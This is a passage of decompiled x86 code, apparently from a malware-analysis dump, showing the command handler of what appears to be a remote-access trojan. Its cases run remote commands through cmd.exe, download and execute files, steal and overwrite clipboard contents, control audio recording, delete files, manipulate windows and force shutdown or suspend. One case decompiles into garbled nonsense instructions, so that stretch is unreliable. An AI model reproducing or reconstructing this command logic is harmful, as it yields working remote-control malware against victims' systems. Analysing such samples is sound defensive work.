                    						_t471 = _t467 - 0x18;
                    						E004020D6(_t371, _t471, _t437, __eflags, _t321);
                    						_t323 = E00401E45( &_v460, _t437, _t460, __eflags, 2);
                    						E004020D6(_t371, _t471 - 0x18, _t437, __eflags, _t323);
                    						E0040415E(_t371, _t471, _t437, _t460, E00401F8B(E00401E45( &_v468, _t437, _t460, __eflags, 1)));
                    						E0040415E(_t371, _t471 - 0xffffffffffffffe8, _t437, _t460, E00401F8B(E00401E45( &_v476, _t437, _t460, __eflags, 0)));
                    						E00408909( &_v300, _t437, __eflags);
                    						__eflags = _v396;
                    						if(_v396 == 0) {
                    							E0040908A( &_v444,  *((intOrPtr*)(E00409069(E004090EE( &_v300,  &_v504),  &_v500, _t455))));
                    						}
                    						E0040905E();
                    						goto L138;
                    					} else {
                    						_t456 = _t452 - 1;
                    						if(_t456 > 0x33) {
                    							L138:
                    							E00401E6D( &_v444, _t437);
                    							E00401FB8();
                    							E00401FB8();
                    							return 0;
                    						} else {
                    							switch( *((intOrPtr*)(_t456 * 4 +  &M0041614C))) {
                    								case 0:
                    									_t340 = E0041A6E9(0,  &_v400, GetTickCount());
                    									_t342 = E0041A6E9(0,  &_v376, E0041A641( &_v400));
                    									_t343 = E0041A5F1(0,  &_v332, 0x472ec8); // executed
                    									_t344 = E0041A879(0,  &_v28, _t343);
                    									_t446 = E00402EF0(0,  &_v436, E00402E81( &_v128, E00402EF0(0,  &_v104, E00402E81( &_v80, E00402F11( &_v56, E00401E45( &_v444, _t343, _t460, _t478, 0), _t460, 0x472ec8), _t344), _t460, _t478, 0x472ec8), _t342), _t460, _t478, 0x472ec8);
                    									E00402E81(_t467 - 0x18, _t350, _t340);
                    									_push(0x4c);
                    									E00404A81(0x4734e8, _t350, _t478);
                    									E00401FB8();
                    									E00401FB8();
                    									E00401FB8();
                    									E00401FB8();
                    									E00401FB8();
                    									E00401FB8();
                    									E00401EE9();
                    									E00401FB8();
                    									E00401FB8();
                    									_t364 = E0043A3AC(_t362, E00401F8B(E00401E45( &_v476, _t350, _t460, _t478, 1)));
                    									if(_t364 == 0) {
                    										E00401E45( &_v464, _t446, _t460, __eflags, 0);
                    										_t437 = "0";
                    										_t366 = E00405AE5("0");
                    										__eflags = _t366;
                    										if(_t366 != 0) {
                    											_push(0);
                    											_t435 = 0x4734e8;
                    											goto L10;
                    										}
                    									} else {
                    										_t437 = _t364 + _t364;
                    										if(E004046D3(0x4734e8) == 0) {
                    											E00404F31(0x4734e8, _t437, 1);
                    										} else {
                    											E00404FD4(_t437);
                    										}
                    									}
                    									goto L138;
                    								case 1:
                    									_push(0);
                    									__ecx = 0x4734e8;
                    									L10:
                    									E004050C4(_t435, _t460);
                    									goto L138;
                    								case 2:
                    									__ecx =  &_v400;
                    									__eax = E0041B008(__ebx,  &_v400, __edx);
                    									__esp = __esp - 0x18;
                    									__edx = __eax;
                    									__ecx = __esp;
                    									__eax = E0041A879(__ebx, __esp, __edx);
                    									_push(0x33);
                    									__ecx = 0x4734e8;
                    									__eax = E00404A81(0x4734e8, __edx, __eflags);
                    									__ecx =  &_v428;
                    									goto L104;
                    								case 3:
                    									goto L138;
                    								case 4:
                    									 &_v352 = GetCurrentProcessId();
                    									__eax = E00440751(__ecx, __eax,  &_v352, 0xa);
                    									__esp = __esp - 0xc;
                    									__eax =  &_v352;
                    									__esi = __esp;
                    									__ecx =  &_v376;
                    									__edx = E0040EE40(__ebx,  &_v376, __edx, __eflags);
                    									__ecx =  &_v400;
                    									__edx = __eax;
                    									__ecx = __esp;
                    									__eax = E00408832(__ebx, __esp, __edx, __edi, __ebp, __eflags,  &_v352);
                    									_push(0x4f);
                    									goto L14;
                    								case 5:
                    									__ecx =  &_v444;
                    									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__eax = E00401F8B(__ecx);
                    									__ecx = __eax;
                    									__eax = E0041A6BC(__ecx);
                    									goto L138;
                    								case 6:
                    									L22:
                    									__eax = E004167F1(__ebx);
                    									goto L138;
                    								case 7:
                    									__ecx =  &_v444;
                    									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__eax = E00401F8B(__ecx);
                    									__eax = CloseWindow(__eax);
                    									goto L138;
                    								case 8:
                    									_push(3);
                    									goto L18;
                    								case 9:
                    									_push(9);
                    									L18:
                    									_push(0);
                    									L19:
                    									__ecx =  &_v444;
                    									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags);
                    									__eax = E00401F8B(__ecx);
                    									__eax = ShowWindow(__eax, ??);
                    									goto L138;
                    								case 0xa:
                    									__eax =  &_v348;
                    									__ecx =  &_v444;
                    									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__eax = E00401F8B(__ecx);
                    									__eax = GetWindowThreadProcessId(__eax,  &_v348);
                    									__ecx = _v352;
                    									__eax = E0041A6BC(_v352);
                    									goto L22;
                    								case 0xb:
                    									__ebx = 0;
                    									__ecx =  &_v444;
                    									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__eax = E00401F8B(__eax);
                    									__ecx =  &_v380;
                    									__eax = E0040415E(0,  &_v380, __edx, __ebp, __eax);
                    									__edx = L"/C ";
                    									__ecx =  &_v408;
                    									__ecx = __eax;
                    									__eax = ShellExecuteW(0, L"open", L"cmd.exe", __eax, 0, 0);
                    									__ecx =  &_v408;
                    									__eax = E00401EE9();
                    									__ecx =  &_v384;
                    									goto L104;
                    								case 0xc:
                    									__ecx =  &_v444;
                    									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 1);
                    									__ecx = 0x472f78;
                    									__eax = E00401FA0(0x472f78, __eax);
                    									__eflags =  *0x470ae7 - __bl; // 0x0
                    									if(__eflags == 0) {
                    										__ecx =  &_v444;
                    										__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    										__esp = __esp - 0x18;
                    										__ecx = __esp;
                    										__eax = E0040567A();
                    										goto L100;
                    									}
                    									goto L138;
                    								case 0xd:
                    									__ebx = 0;
                    									__ecx =  &_v444;
                    									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									E00401F8B(__ecx) = ShellExecuteW(0, L"open", __eax, 0, 0, 1);
                    									goto L138;
                    								case 0xe:
                    									__ecx =  &_v444;
                    									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 2);
                    									__eax = E00401F8B(__ecx);
                    									__eax = E0043A3AC(__ecx, __eax);
                    									__ecx =  &_v448;
                    									__esi = __eax;
                    									__eax = E00401E45( &_v448, __edx, __ebp, __eflags, 0);
                    									__ecx =  &_v440;
                    									__eax = E004020D6(__ebx,  &_v440, __edx, __eflags, __eax);
                    									__edx = "0";
                    									__ecx =  &_v444;
                    									__eax = E0040AF37(__eflags);
                    									__ecx =  &_v456;
                    									_push(4);
                    									__eflags = __al;
                    									if(__eflags == 0) {
                    										__eax = E00401E45( &_v456, __edx, __ebp, __eflags);
                    										__esp = __esp - 0x18;
                    										__ecx = __esp;
                    										__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
                    										__esp = __esp - 0x18;
                    										__eax =  &_v440;
                    										__ecx = __esp;
                    										__eax = E004020D6(__ebx, __esp, __edx, __eflags,  &_v440);
                    										__edi = 0x4736e8;
                    									} else {
                    										__eax = E00401E45( &_v456, __edx, __ebp, __eflags);
                    										__esp = __esp - 0x18;
                    										__ecx = __esp;
                    										__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
                    										__esp = __esp - 0x18;
                    										__eax =  &_v440;
                    										__ecx = __esp;
                    										__eax = E004020D6(__ebx, __esp, __edx, __eflags,  &_v440);
                    										__edi = 0x473630;
                    									}
                    									__ecx = __edi;
                    									__eax = E0041765D(__edi, __edx);
                    									__ecx =  &_v492;
                    									__ecx = E00401E45( &_v492, __edx, __ebp, __eflags, 3);
                    									__eax = E00401F8B(__ecx);
                    									__eax = E0043A3AC(__ecx, __eax);
                    									__eflags = __eax;
                    									__eax = __eax & 0xffffff00 | __eflags != 0x00000000;
                    									__ecx =  &_v496;
                    									__eax = __al & 0x000000ff;
                    									__ecx = E00401E45( &_v496, __edx, __ebp, __eflags, 1);
                    									E00401F8B(__ecx) = E0043A3AC(__ecx, __eax);
                    									__ecx = __edi;
                    									__eax = E00417825(__edi, __eflags, __eax, __al & 0x000000ff, __esi);
                    									goto L136;
                    								case 0xf:
                    									__ecx =  &_v432;
                    									__eax = E00419EDB( &_v432, __edx);
                    									__esp = __esp - 0x18;
                    									__eax =  &_v432;
                    									__ecx = __esp;
                    									__eax = E004020D6(__ebx, __esp, __edx, __eflags,  &_v432);
                    									_push(0x11);
                    									__ecx = 0x4734e8;
                    									__eax = E00404A81(0x4734e8, __edx, __eflags);
                    									L136:
                    									__ecx =  &_v432;
                    									goto L137;
                    								case 0x10:
                    									__ecx =  &_v444;
                    									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
                    									__ecx = 0x473040;
                    									__eax = E0040959D(0x473040, __edx);
                    									goto L138;
                    								case 0x11:
                    									__ecx = 0x473040;
                    									__eax = E0040A461(0x473040, __edx);
                    									goto L138;
                    								case 0x12:
                    									__ecx = 0x473040;
                    									__eax = E0040A5C4(__ebx, 0x473040, __edx);
                    									goto L138;
                    								case 0x13:
                    									__ecx =  &_v444;
                    									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__ecx = 0x4730d0;
                    									__eax = E00401FA0(0x4730d0, __eax);
                    									__ecx = 0x473040;
                    									goto L35;
                    								case 0x14:
                    									 *0x470b34 =  *0x470b34 + 1;
                    									__eflags =  *0x470b34;
                    									__ecx =  &_v444;
                    									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 1);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
                    									__ecx =  &_v452;
                    									__eax = E00401E45( &_v452, __edx, __ebp, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
                    									__ecx = 0x473040;
                    									__eax = E0040A006(__ebx, 0x473040, __edx, __eflags);
                    									goto L37;
                    								case 0x15:
                    									__esi = 0x473040;
                    									__ecx = 0x473040;
                    									__eax = E0040ADDF(0x473040);
                    									__ecx = 0x473040;
                    									L35:
                    									__eax = E00409EB4(__ebx, __ecx);
                    									goto L138;
                    								case 0x16:
                    									__eflags =  *0x470b1a - __bl;
                    									asm("sbb eax, 0x470b1a");
                    									if(__eflags == 0) {
                    										__edx = 0;
                    										__cl = 0;
                    										__eax = E0040B6DC(0);
                    									}
                    									goto L138;
                    								case 0x17:
                    									__ebx = 0;
                    									__ecx =  &_v444;
                    									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__edi = 0x472e30;
                    									__ecx = 0x472e30;
                    									__eax = E00401FA0(0x472e30, __eax);
                    									__esi = 0x472e48;
                    									__ecx = 0x472e48;
                    									__eax = E0040480D(0x472e48);
                    									__ecx = 0x472e48;
                    									__eax = E004048A8(0x472e48, 0x472e48, 0x472e48);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									_push(0x472e30);
                    									__eflags =  *0x470aba - __bl; // 0x0
                    									if(__eflags == 0) {
                    										__eax = E004020D6(0, __ecx, __edx, __eflags);
                    									} else {
                    										__eax = E004020D6(0, __ecx, __edx, __eflags);
                    									}
                    									__ecx = __esi;
                    									__eax = E00404A81(__esi, __edx, __eflags);
                    									__ecx = __esi;
                    									__eax = E00404BF0(__ecx, __edx, 0x404401, __ebx);
                    									goto L138;
                    								case 0x18:
                    									__eax =  *0x470ad0();
                    									__ecx = 0x472e48;
                    									__eax = E00404E06(__edx);
                    									goto L138;
                    								case 0x19:
                    									__ebx = 0;
                    									__ecx =  &_v444;
                    									 *0x470a84 = __bl;
                    									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 3);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E004020D6(0, __esp, __edx, __eflags, __eax);
                    									__ecx =  &_v452;
                    									__ecx = E00401E45( &_v452, __edx, __ebp, __eflags, 2);
                    									E00401F8B(__ecx) = E0043A3AC(__ecx, __eax);
                    									__ecx =  &_v456;
                    									__ecx = E00401E45( &_v456, __edx, __ebp, __eflags, 1);
                    									__eax = E00401F8B(__ecx);
                    									__eax = E0043A3AC(__ecx, __eax);
                    									__ecx =  &_v460;
                    									__esi = __eax;
                    									__ecx = E00401E45( &_v460, __edx, __ebp, __eflags, 0);
                    									__eax = E00401F8B(__ecx);
                    									__eax = E0043A3AC(__ecx, __eax);
                    									__edx = __esi;
                    									__ecx = __eax;
                    									__eax = E004016EF(__ecx, __edx, __edi, __esi, __ebp, __eax);
                    									goto L138;
                    								case 0x1a:
                    									_push( *0x470ac8);
                    									__eax = __eax ^ 0x00470ac8;
                    									 *0x470a84 = 1;
                    									waveInStop(??) = waveInClose( *0x470ac8);
                    									goto L138;
                    								case 0x1b:
                    									 *0x470b34 =  *0x470b34 + 1;
                    									__eflags =  *0x470b34;
                    									__eax = 0x470b34 + __eax;
                    									__ecx =  &_v444;
                    									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 1);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
                    									__ecx =  &_v452;
                    									__eax = E00401E45( &_v452, __edx, __ebp, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E00411E6D(__ebx, __edx);
                    									__esp = __esp + 0x30;
                    									L37:
                    									 *0x470b34 =  *0x470b34 - 1;
                    									goto L138;
                    								case 0x1c:
                    									__ecx =  &_v444;
                    									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									E00401F8B(__ecx) = DeleteFileW(__eax);
                    									goto L138;
                    								case 0x1d:
                    									__eax = E00411D93();
                    									ExitProcess(0);
                    								case 0x1e:
                    									while(1) {
                    										__eflags =  *0x470b34 - __ebx;
                    										if( *0x470b34 == __ebx) {
                    											break;
                    										}
                    										Sleep(0x64);
                    									}
                    									asm("lds ecx, [ebx]");
                    									 *__eax =  *__eax + __al;
                    									__eflags =  *__eax;
                    									E0040C5A4();
                    									asm("ror dword [esi+0x41], 0x0");
                    									asm("insd");
                    									_push(__eax);
                    									__ecx = __ecx + 1;
                    									_a86 = _a86 + __ah;
                    									__ecx = __ecx + 1;
                    									 *__eax =  *__eax + __bl;
                    									asm("popad");
                    									__ecx = __ecx + 1;
                    									 *__eax =  *__eax + __bl;
                    									asm("popad");
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __dh;
                    									__ecx = __ecx + 1;
                    									__ah = __ah + __dl;
                    									_push(__eax);
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__edi + 0x51)) =  *((intOrPtr*)(__edi + 0x51)) + __dh;
                    									__ecx = __ecx + 1;
                    									__cl = __cl + __bh;
                    									_push(__eax);
                    									__ecx = __ecx + 1;
                    									 *__esi =  *__esi + __bl;
                    									_push(__ecx);
                    									__ecx = __ecx + 1;
                    									_a77 = _a77 + __al;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__ecx + 0x51)) =  *((intOrPtr*)(__ecx + 0x51)) + __cl;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__ecx - 0x24ffbeaf)) =  *((intOrPtr*)(__ecx - 0x24ffbeaf)) + __al;
                    									_push(__ecx);
                    									__ecx = __ecx + 1;
                    									 *0x46004152 =  *0x46004152 + __bl;
                    									_push(__edx);
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__eax + 0x41 + __edx * 2)) =  *((intOrPtr*)(__eax + 0x41 + __edx * 2)) + __al;
                    									 *__eax =  *__eax + __ch;
                    									_push(__ebx);
                    									__ecx = __ecx + 1;
                    									_a79 = _a79 + __cl;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__ebx + 0x41 + __edx * 2)) =  *((intOrPtr*)(__ebx + 0x41 + __edx * 2)) + __bl;
                    									 *((intOrPtr*)(__ebx + 0x53)) =  *((intOrPtr*)(__ebx + 0x53)) + __ch;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__eax - 0x28ffbead)) =  *((intOrPtr*)(__eax - 0x28ffbead)) + __dl;
                    									_push(__ebx);
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__edi + 0x1800415a)) =  *((intOrPtr*)(__edi + 0x1800415a)) + __ch;
                    									asm("popad");
                    									__ecx = __ecx + 1;
                    									 *__eax =  *__eax + __bl;
                    									asm("popad");
                    									__ecx = __ecx + 1;
                    									__bh = __bh + __ah;
                    									_push(__ebx);
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__ebx + 0x54)) =  *((intOrPtr*)(__ebx + 0x54)) + __cl;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__eax + 0x54)) =  *((intOrPtr*)(__eax + 0x54)) + __ah;
                    									__ecx = __ecx + 1;
                    									__ah = __ah + __bl;
                    									_push(__esp);
                    									__ecx = __ecx + 1;
                    									 *__eax =  *__eax + __al;
                    									_push(__ebp);
                    									__ecx = __ecx + 1;
                    									 *__edi =  *__edi + __bh;
                    									_push(__ebp);
                    									__ecx = __ecx + 1;
                    									_a81 = _a81 + __bl;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__edx + 0x55)) =  *((intOrPtr*)(__edx + 0x55)) + __dh;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__edi - 0x78ffbea1)) =  *((intOrPtr*)(__edi - 0x78ffbea1)) + __cl;
                    									_push(__ebp);
                    									__ecx = __ecx + 1;
                    									 *0x69004156 =  *0x69004156 + __cl;
                    									_push(__esi);
                    									__ecx = __ecx + 1;
                    									__ch = __ch + __dh;
                    									_push(__esi);
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__eax + 0x58020041 + __ebx * 2)) =  *((intOrPtr*)(__eax + 0x58020041 + __ebx * 2)) + __bl;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__ecx - 0x1ffbea8)) =  *((intOrPtr*)(__ecx - 0x1ffbea8)) + __al;
                    									_pop(__eax);
                    									__ecx = __ecx + 1;
                    									 *__edx =  *__edx + __dh;
                    									_pop(__ecx);
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__ebx - 0x72ffbea7)) =  *((intOrPtr*)(__ebx - 0x72ffbea7)) + __al;
                    									_pop(__ecx);
                    									__ecx = __ecx + 1;
                    									_v855621291 = _v855621291 + __ch;
                    									_pop(__ecx);
                    									__ecx = __ecx + 1;
                    									__ch = __ch + __ch;
                    									_pop(__ecx);
                    									__ecx = __ecx + 1;
                    									_a86 = _a86 + __al;
                    									__ecx = __ecx + 1;
                    									 *__eax =  *__eax + __bl;
                    									asm("popad");
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__edi + 0x200415a)) =  *((intOrPtr*)(__edi + 0x200415a)) + __cl;
                    									_pop(__esp);
                    									__ecx = __ecx + 1;
                    									 *__edi =  *__edi + __ah;
                    									_pop(__esp);
                    									__ecx = __ecx + 1;
                    									_a89 = _a89 + __ah;
                    									__ecx = __ecx + 1;
                    									 *__edx =  *__edx + __bl;
                    									_pop(__esi);
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__ecx + 0x5e)) =  *((intOrPtr*)(__ecx + 0x5e)) + __dh;
                    									__ecx = __ecx + 1;
                    									__bh = __bh + __bl;
                    									_pop(__ebx);
                    									__ecx = __ecx + 1;
                    									_v1124056743 = _v1124056743 + __bl;
                    									_pop(__ebp);
                    									__ecx = __ecx + 1;
                    									 *__edx =  *__edx + __bl;
                    									_pop(__edi);
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__edi + __ebx * 2)) =  *((intOrPtr*)(__edi + __ebx * 2)) + __ah;
                    									__ecx = __ecx + 1;
                    									 *__esi =  *__esi + __ch;
                    									_pop(__edi);
                    									__ecx = __ecx + 1;
                    									__al = __al + __ch;
                    									_pop(__esi);
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__ecx + 0x3800415e)) =  *((intOrPtr*)(__ecx + 0x3800415e)) + __dl;
                    									_pop(__edi);
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__ebx + 0x5500415e)) =  *((intOrPtr*)(__ebx + 0x5500415e)) + __bl;
                    									_pop(__ebp);
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__ebp + 0x41 + __ebx * 2)) =  *((intOrPtr*)(__ebp + 0x41 + __ebx * 2)) + __bl;
                    									 *((intOrPtr*)(__eax - 0x22ffbea4)) =  *((intOrPtr*)(__eax - 0x22ffbea4)) + __ah;
                    									_pop(__ebp);
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__ecx + 0xb00415f)) =  *((intOrPtr*)(__ecx + 0xb00415f)) + __bl;
                    									_pop(__ebp);
                    									__ecx = __ecx + 1;
                    									 *__eax =  *__eax + __dh;
                    									_pop(__ebp);
                    									__ecx = __ecx + 1;
                    									__bh = __bh + __ch;
                    									_pop(__edi);
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__eax + 0x60)) =  *((intOrPtr*)(__eax + 0x60)) + __cl;
                    									__ecx = __ecx + 1;
                    									 *__eax =  *__eax + __bl;
                    									asm("popad");
                    									__ecx = __ecx + 1;
                    									 *__eax =  *__eax + __al;
                    									asm("sbb [ecx], al");
                    									asm("sbb [edx], al");
                    									__ebx = __ebx +  *__eax;
                    									__al = __al + 5;
                    									_push(es);
                    									_pop(es);
                    									asm("sbb [eax], bl");
                    									asm("sbb [eax], cl");
                    									 *__edx =  *__edx | __ecx;
                    									asm("sbb [ebx], cl");
                    									__al = __al | 0x00000018;
                    									asm("sbb [eax], bl");
                    									asm("sbb [eax], bl");
                    									asm("sbb [eax], bl");
                    									__eflags = __eax;
                    									asm("sbb [eax], bl");
                    									asm("adc [eax], ebx");
                    									asm("sbb [eax], bl");
                    									asm("sbb [eax], bl");
                    									asm("sbb [eax], bl");
                    									asm("sbb [eax], bl");
                    									asm("sbb [eax], bl");
                    									asm("sbb [eax], bl");
                    									asm("sbb [eax], bl");
                    									asm("sbb [eax], bl");
                    									asm("sbb [edx], dl");
                    									asm("adc ebx, [eax]");
                    									asm("adc al, 0x15");
                    									_push(ss);
                    									_pop(ss);
                    									_push(__esi);
                    									__esi = __ecx;
                    									__ecx = __esi + 4;
                    									E004046D7(__esi + 4, __ebp, 0) = __esi;
                    									_pop(__esi);
                    									return __esi;
                    									goto L141;
                    								case 0x1f:
                    									L130:
                    									__eax = E0040CD03(__ebx, __eflags);
                    									goto L138;
                    								case 0x20:
                    									while(1) {
                    										__eflags =  *0x470b34 - __ebx; // 0x0
                    										if(__eflags == 0) {
                    											break;
                    										}
                    										Sleep(0x64);
                    									}
                    									__ebx = 0;
                    									__ecx =  &_v444;
                    									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__eax = E00401F8B(__eax);
                    									__ecx =  &_v448;
                    									__esi = __eax;
                    									__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 1);
                    									__eax = E00401F8B(__eax);
                    									__dl =  *__esi;
                    									__ecx =  &_v440;
                    									__eax = E0040CF38( &_v440, __edx, __eax);
                    									_push(0);
                    									_push(0);
                    									__ecx =  &_v440;
                    									_push(E00401EE4( &_v440));
                    									__ecx =  &_v452;
                    									__ecx = E00401E45( &_v452, __edx, __ebp, __eflags, 2);
                    									__eax = E00401F8B(__eax);
                    									_push(__eax);
                    									_push(0);
                    									__imp__URLDownloadToFileW();
                    									__eflags = __eax;
                    									if(__eflags == 0) {
                    										__esp = __esp - 0x18;
                    										__eax =  &_v452;
                    										__ecx = __esp;
                    										E004086D0(0, __esp, __edx, __eflags,  &_v452) = E0040C929(__edx);
                    										__esp = __esp + 0x18;
                    									}
                    									goto L103;
                    								case 0x21:
                    									__ecx =  &_v260;
                    									__eax = E004046D7( &_v260, __ebp, 1);
                    									__ecx =  &_v264;
                    									__eax = E004048A8( &_v264, __esi,  &_v264);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E00402073(__ebx, __esp, __edx, __ebp, 0x464074);
                    									_push(0x25);
                    									__ecx =  &_v272;
                    									__eax = E00404A81( &_v272, __edx, __eflags);
                    									__ecx =  &_v300;
                    									__eax = E00404BF0( &_v300, __edx, E0040D144, 0);
                    									__ecx =  &_v308;
                    									__eax = E00404EC2(__ebx, __ecx, __edx, __esi);
                    									goto L138;
                    								case 0x22:
                    									__ecx =  &_v444;
                    									__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 2);
                    									__eax = E00401F8B(__ecx);
                    									__eax = __eax + 0x10000;
                    									__ecx =  &_v448;
                    									__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 1);
                    									__eax = E00401F8B(__eax);
                    									__ebx = 0;
                    									__ecx =  &_v452;
                    									__ecx = E00401E45( &_v452, __edx, __ebp, __eflags, 0);
                    									__eax = E00401F8B(__eax);
                    									__eax = MessageBoxW(0, __eax, __eax, __eax);
                    									__ecx =  &_v456;
                    									__esi = __eax;
                    									__eax = E00401E45( &_v456, __edx, __ebp, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx =  &_v392;
                    									__edi = __esp;
                    									__edx = __esi;
                    									__edx = E0041A6E9(0,  &_v392, __esi);
                    									__ecx =  &_v416;
                    									__edx = __eax;
                    									__ecx = __edi;
                    									__eax = E00402EF0(0, __edi, __edx, __ebp, __eflags, __eax);
                    									_push(0x26);
                    									L14:
                    									__ecx = 0x4734e8;
                    									__eax = E00404A81(0x4734e8, __edx, __eflags);
                    									__ecx =  &_v428;
                    									__eax = E00401FB8();
                    									__ecx =  &_v404;
                    									L137:
                    									__eax = E00401FB8();
                    									goto L138;
                    								case 0x23:
                    									__eax = E00416840();
                    									__ebx = 0;
                    									__ecx =  &_v444;
                    									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__edx = "0";
                    									__ecx = __eax;
                    									__eax = E00405AE5(__edx);
                    									__ecx =  &_v448;
                    									_push(0);
                    									__eflags = __al;
                    									if(__eflags == 0) {
                    										__eax = E00401E45( &_v448, __edx, __ebp, __eflags);
                    										__edx = "1";
                    										__ecx = __eax;
                    										__eax = E00405AE5(__edx);
                    										__ecx =  &_v448;
                    										_push(0);
                    										__eflags = __al;
                    										if(__eflags == 0) {
                    											__eax = E00401E45( &_v448, __edx, __ebp, __eflags);
                    											__edx = "2";
                    											__ecx = __eax;
                    											__eax = E00405AE5(__edx);
                    											__eflags = __al;
                    											if(__eflags == 0) {
                    												__eax = LoadLibraryA("PowrProf.dll");
                    												__eax = GetProcAddress(__eax, "SetSuspendState");
                    												__ecx =  &_v444;
                    												__esi = __eax;
                    												__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    												__edx = "3";
                    												__ecx = __eax;
                    												__eax = E00405AE5(__edx);
                    												_push(0);
                    												__eflags = __al;
                    												if(__eflags == 0) {
                    													__ecx =  &_v444;
                    													__eax = E00401E45( &_v444, __edx, __ebp, __eflags);
                    													__edx = "4";
                    													__ecx = __eax;
                    													__eax = E00405AE5(__edx);
                    													__eflags = __al;
                    													if(__al != 0) {
                    														_push(0);
                    														_push(0);
                    														_push(1);
                    														goto L72;
                    													}
                    												} else {
                    													_push(0);
                    													_push(0);
                    													L72:
                    													__eax =  *__esi();
                    												}
                    											} else {
                    												_push(0);
                    												__ecx =  &_v444;
                    												__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 1);
                    												__eax = E00401F8B(__ecx);
                    												__eax = E0043A3AC(__ecx, __eax);
                    												__eax = __eax | 0x00000002;
                    												__eflags = __eax;
                    												goto L67;
                    											}
                    										} else {
                    											__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 1);
                    											__eax = E00401F8B(__ecx);
                    											__eax = E0043A3AC(__ecx, __eax);
                    											__eax = __eax | 0x00000001;
                    											goto L67;
                    										}
                    									} else {
                    										__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 1);
                    										__eax = E00401F8B(__ecx);
                    										__eax = E0043A3AC(__ecx, __eax);
                    										L67:
                    										_pop(__ecx);
                    										__eax = ExitWindowsEx(__eax, ??);
                    									}
                    									goto L138;
                    								case 0x24:
                    									L78:
                    									__eax = OpenClipboard(__ebx);
                    									__eflags = __eax;
                    									if(__eax != 0) {
                    										__esi = GetClipboardData(0xd);
                    										__edi = GlobalLock(__esi);
                    										GlobalUnlock(__esi) = CloseClipboard();
                    										__eflags = __edi;
                    										0x46a8f0 =  !=  ? __edi : 0x46a8f0;
                    										__ecx =  &_v432;
                    										__eax = E0040415E(__ebx,  &_v432, __edx, __ebp,  !=  ? __edi : 0x46a8f0);
                    										__esp = __esp - 0x18;
                    										__edx =  &_v436;
                    										__ecx = __esp;
                    										__eax = E0041A879(__ebx, __esp, __edx);
                    										_push(0x6b);
                    										__ecx = 0x4734e8;
                    										__eax = E00404A81(0x4734e8, __edx, __eflags);
                    										L103:
                    										__ecx =  &_v432;
                    										L104:
                    										__eax = E00401EE9();
                    									}
                    									goto L138;
                    								case 0x25:
                    									__eflags = OpenClipboard(0);
                    									if(__eflags != 0) {
                    										__eax = EmptyClipboard();
                    										__ecx =  &_v444;
                    										__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    										__eax = E0040245C();
                    										__eax = __eax + 2;
                    										__edi = __eax;
